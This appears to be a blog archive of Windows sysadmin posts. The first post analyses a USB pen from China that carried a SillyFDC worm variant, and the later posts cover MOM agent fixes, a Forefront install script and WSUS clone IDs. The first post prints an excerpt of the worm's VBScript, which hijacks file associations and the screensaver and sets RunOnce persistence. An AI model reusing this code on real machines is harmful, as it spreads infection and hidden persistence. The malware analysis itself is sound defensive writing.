Category Archives: VBS

From China with Love

Posted on by
1

I received two gifts from a family member returning from China.

It was a lovely thought and I was touched by the gesture.

Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.

2GB USB voice recorder pen

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.

The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.

This is some of what I extracted:

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")

Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"

rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.

Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!

Forefront and MOM agents not playing nice on the MOM console

Posted on by
Reply

These annoying errors keep popping up in my Forefront MOM console from Forefront MOM agents on random machines around the network.

Error in the MOM Console

Type: Warning
Provider Name: Application
Event Number: 21294

Description:

The response processor was denied to execute a response. The action account the MOM Agent is using doesn’t have enough privileges. Returned error message: Access is denied.

Type: Warning
Provider Name: Application
Event Number: 21245
Provider Type: Event Log
Source: Microsoft Operations Manager
Category: MOM Agent

Description:

The response processor failed to execute a response. The response returned the error message: The object exporter specified was not found.

Ms have a paper on these typical errors

http://technet.microsoft.com/en-us/library/bb643197(TechNet.10).aspx

My fix to sort out 50+ alerts of these in one fell swoop:

From the MOM console sort the errors by type, select them, right click and copy select text. Drop it in to a test editor, clean it up and get a list of all the computer names.

Drop the computer names in to a text file,each on their own line and save (FailedTargets.txt)

To cheat and do a copy of quick fixes, my “Superior” batch skills came to the fore and I knocked this up with PSexec. Could have been done with SMS, login scripts or a proper script but quick and dirty …

Example:

psexec.exe to @FailedTargets.txt -c MOMclient.bat

MOMclient.bat contents

REM Sets the correct dependence on the MOM service

sc config mom depend= rpcSs/eventLog/winmgmt

REM Stops then starts the MOM service on the target machine

net stop MOM

net start MOM

Niffy VBS for deploying Forefront without MOM

Posted on by
Reply

Found this on the Ms technet forums after hacking up a batch script to do the same sort of thing.

******************************************************************
‘ Purpose: Launches install of Forefront client in
‘ standalone mode
‘*****************************************************************

Option Explicit
Dim WshShell
Dim MsgVar1
Dim MsgVar2

MsgVar1 = “Install Forefront Security”

MsgVar2 = “Install Microsoft Forefront?” & VbCrLf & VbCrLf _
& “If Yes then please wait for end of job message.”
If MsgBox(MsgVar2, vbQuestion + vbYesNo, MsgVar1) = vbNo Then WScript.Quit

Set WshShell = CreateObject(“WScript.Shell”)

WshShell.Run “CLIENTSETUP.EXE /nomom”, 0, True

MsgVar2 = “Forefront installation has completed.”
MsgBox MsgVar2, vbInformation + vbOKOnly, MsgVar1

Set WshShell = nothing

My hacked batch script doesn’t use the clientsetup.exe, just the .msi files including the lastest virus definations pulled down from the Ms Catalog site. Worked for me and fits nicely on a small usb thumb drive.

REM
REM Installs the Forefront client software
REM
\mp_ambits.msi
REM
REM Installs the Security State Assessment agent software
\FCSSSA.msi
REM
REM Install Forefront client definations of 01-May-2008
REM

The trouble with clones

Posted on by
Reply

WSUS and clones, it appears, have a bit of a problem.

Despite sysprep and other steps cloned machines keep their WSUS ID. Therefore you only every see one of the cloned machines in the WSUS console. This is a well know issue, but one I keep forgetting …

To avoid mucking around with purging registry keys, this handy batch or VB script sort everything out.

http://msmvps.com/blogs/athif/archive/2005/09/04/65174.aspx

Genius!